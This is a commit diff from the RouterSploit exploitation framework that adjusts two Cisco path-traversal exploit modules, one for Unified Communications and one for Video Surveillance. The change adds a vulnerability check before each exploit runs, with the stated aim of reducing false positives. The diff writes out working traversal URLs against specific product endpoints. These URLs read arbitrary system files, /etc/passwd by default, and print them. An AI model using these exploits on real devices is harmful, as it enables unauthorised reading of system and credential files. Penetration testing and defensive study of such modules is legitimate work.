Fixing false positives.

b9c67c24 · Marcin Bury · 3b71264e · b9c67c24 · b9c67c24
Commit b9c67c24 authored May 30, 2016 by Marcin Bury
Showing with 8 additions and 2 deletions

unified_multi_path_traversal.py ...it/modules/exploits/cisco/unified_multi_path_traversal.py +4 -1

video_surv_path_traversal.py ...ploit/modules/exploits/cisco/video_surv_path_traversal.py +4 -1

No files found.
--- a/routersploit/modules/exploits/cisco/unified_multi_path_traversal.py
+++ b/routersploit/modules/exploits/cisco/unified_multi_path_traversal.py
@@ -44,6 +44,7 @@ class Exploit(exploits.Exploit):
    filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')

    def run(self):
+        if self.check():
            url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)

            response = http_request(method="GET", url=url)
@@ -55,6 +56,8 @@ class Exploit(exploits.Exploit):
                print_info(response.text)
            else:
                print_error("Exploit failed - could not read file")
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
@@ -64,7 +67,7 @@ class Exploit(exploits.Exploit):
        if response is None:
            return False  # target is not vulnerable

-        if response.status_code == 200 and len(response.text):
+        if response.status_code == 200 and "admin:" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/cisco/video_surv_path_traversal.py
+++ b/routersploit/modules/exploits/cisco/video_surv_path_traversal.py
@@ -36,6 +36,7 @@ class Exploit(exploits.Exploit):
    filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')

    def run(self):
+        if self.check():
            url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename)

            response = http_request(method="GET", url=url)
@@ -48,6 +49,8 @@ class Exploit(exploits.Exploit):
                print_info(response.text)
            else:
                print_error("Exploit failed - could not read file")
+        else:
+            print_error("Exploit failed - device seems to be not vulnerable")

    @mute
    def check(self):
@@ -57,7 +60,7 @@ class Exploit(exploits.Exploit):
        if response is None:
            return False  # target is not vulnerable

-        if response.status_code == 200 and len(response.text):
+        if response.status_code == 200 and "admin:" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable